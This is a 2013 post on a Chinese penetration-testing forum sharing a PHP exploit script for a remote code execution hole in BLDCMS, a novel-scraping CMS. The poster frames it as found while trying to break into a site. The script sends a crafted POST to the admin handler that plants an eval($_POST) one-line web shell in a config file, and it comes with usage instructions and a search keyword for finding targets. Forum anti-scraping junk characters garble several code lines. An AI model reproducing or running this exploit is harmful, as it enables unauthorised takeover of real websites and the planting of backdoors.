找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 BLDCMS(白老大小说) Getshell 0day EXP
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2131|回复: 0
打印 上一主题 下一主题

BLDCMS(白老大小说) Getshell 0day EXP

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-3-26 20:49:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞
- V3 z# P$ V0 X& h2 \0 K0 H
4 C, P. w$ g3 I+ C! z1 q
% L/ M9 `  v- z1 ]6 u9 W话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了 , N, c) q& q: m8 b* U9 O; {
  i- b! }: f. m3 L
既然都有人发了 我就把我之前写好的EXP放出来吧
8 l: H* _" Y" N
, U7 s; g  t8 b9 Lview source print?01.php;">
4 H5 J8 J* k& ^/ a02.<!--?php, i- [! }* _" J7 w% U2 g
03.echo "-------------------------------------------------------------------* U  L1 N. g/ r; S+ P8 w7 _
04.
; }/ m; d1 |% g, ?* |+ d05.------------\r\n              BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP0 y: ?6 i8 }; |
06. 4 _4 \3 e  P* P8 y% |+ w
07.(GPC=Off)\r\n            Vulnerability discovery&Code by 数据流@wooyun
, ?) Y2 m) y! s* j0 C, v0 q08.
. h1 z1 w9 P8 p# T+ l6 x# b* L09.QQ:981009941\r\n                                2013.3.21\r\n             : P) O1 k  g9 T. d+ ^
10.
0 x. t/ I& D+ ~11.
* k( `  o$ \4 G* S12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码6 m3 H- q# B& }2 |; i+ e3 V* z
13.
% x" i- O+ b" @' y+ [14.)\r\n                    搜索关键字:\"开发者: 白老大小说\"\r\n-----------$ c' a$ r$ ?. c& S- ?
15.
( i+ D& A4 S1 H7 }4 G9 u16.--------------------------------------------------------------------\r\n";1 u2 K2 J! _8 v
17.$url=$argv[1];: o# ?: {& b' @% S5 z3 J7 b
18.$dir=$argv[2];- B! y/ Q* X3 H: \- j1 C
19.$pass=$argv[3];
- B2 E: z, N& J' t( z20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';0 u2 S7 i0 [( G, w) ?
21.if (emptyempty($pass)||emptyempty($url))
" J0 N% f* n8 ^# x+ a22.{exit("请输入参数");}
* a! l, H8 g" }$ o23.else) J9 n7 u6 r* I, q3 t6 {5 e; X
24.{2 j2 T0 b# A! H' E$ \0 X. Z- o  S
25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev+ R" d! T+ V% h( k: X9 U/ j
26.
- L, ?- R! N; E$ V27.al;
& `* e- j5 F$ n' W' ~6 `8 T28.$length = strlen($fuckdata);* F( e- ^0 y) c8 O1 |
29.function getshell($url,$pass)
! B1 ~2 t  c7 C3 n30.{9 W4 J& C0 _, f" h. d' S; c
31.global $url,$dir,$pass,$eval,$length,$fuckdata;
% n3 H( l+ c6 x1 q- ~32.$header = "OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";
: ?) d+ U) S4 z/ l! a! g( u$ V# g33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";; @4 `' `+ B9 b6 Y
34.$header .= "User-Agent: MSIE\r\n";
  c( d' o$ c5 `6 C- F35.$header .= "Host:".$url."\r\n";: z# H1 a5 P, D! [3 Z
36.$header .= "Content-Length: ".$length."\r\n";
1 W8 Z5 Q% n5 ?6 u; _1 p. L37.$header .= "Connection: Close\r\n";
/ o; K6 z0 F4 k( ]/ R38.$header .="\r\n";
. x8 B3 ?, P0 i; b: b& s1 z: y39.$header .= $fuckdata."\r\n\r\n";* L+ F1 K" o  k) b# L, f1 k
40.$fp = fsockopen($url, 80,$errno,$errstr,15);8 u* Y# j0 Y) c& _
41.if (!$fp)- u3 [5 Q7 `, `. h* s
42.{
: w( m# U6 N  ^1 T43.exit ("利用失败:请检查指定目标是否能正常打开");
! ~5 O: h6 N7 u2 Q7 t! o. d* h44.}+ f% x! p) w4 ?. H! q
45.else{ if (!fputs($fp,$header)); d7 }8 e( u% l6 u% P) W% f
46.{exit ("利用失败");}
# ^' I% w9 y0 A4 W5 @47.else
- e; e/ W( I# s1 C. b0 y' a" @48.{; ?& p9 B' }8 F
49.$receive = '';7 d/ z$ }: b: K0 E) j6 y
50.while (!feof($fp)) {) Q& F7 P/ _; K7 k; r. U5 H2 A; f+ h; V
51.$receive .= @fgets($fp, 1000);
; S9 g1 j' d4 F+ ]0 y9 w4 ^52.}% Z. F  Y- O* r- I
53.@fclose($fp);  x, @2 J  X/ n1 z/ A
54.echo "$url/$dir/conn/config/normal2.php passpass(如连接失败 请检查目标( ]. w, L7 I; p& d
55.
( R$ i$ P$ v8 E. ]" {  a56.GPC是否=off)";
' e) \/ D( B" x6 J4 B+ p, j57.}}$ {7 x+ L3 d  o' p
58.}8 J6 g6 h: S  e/ @9 B
59.}7 u% ~2 q: j0 W1 R( O1 g
60.getshell($url,$pass);' b$ L9 w/ O: a% ~2 r1 t
61.?-->& ~$ b5 M; p% I8 i8 f4 e) D
) L5 a/ R% @0 p4 y3 @/ q9 O

8 a0 L4 U) P: b) c7 B( N
  z! f/ v" O+ U6 T- Lby 数据流0 H; R& g$ x- s* R8 [( \, ?9 n  N% k
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表